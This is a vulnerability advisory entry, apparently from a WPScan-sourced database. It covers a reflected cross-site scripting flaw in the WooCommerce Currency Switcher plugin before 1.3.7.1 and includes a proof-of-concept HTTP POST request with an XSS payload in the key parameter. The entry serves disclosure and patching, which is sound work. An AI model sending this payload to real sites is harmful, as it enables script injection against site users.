Lucene search

K
wpvulndbJrXnmWPVDB-ID:DF8A6F2C-E075-45D5-9262-B4EB63C9351E
HistoryNov 08, 2021 - 12:00 a.m.

WooCommerce Currency Switcher < 1.3.7.1 - Reflected Cross-Site Scripting

2021-11-0800:00:00
JrXnm
wpscan.com
6

0.001 Low

EPSS

Percentile

44.3%

The plugin does not sanitise and escape the key parameter of the woocs_update_profiles_data AJAX action (available to any authenticated user) before outputting it back in the response, leading to a Reflected cross-Site Scripting issue

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 82 Connection: close Cookie: [any authenticated user] Cache-Control: max-age=0 action=woocs_update_profiles_data&key;=%3Cimg+src+onerror%3Dalert%28%60XSS%60%29%3E

CPENameOperatorVersion
woocommerce-currency-switcherlt1.3.7.1

0.001 Low

EPSS

Percentile

44.3%

Related for WPVDB-ID:DF8A6F2C-E075-45D5-9262-B4EB63C9351E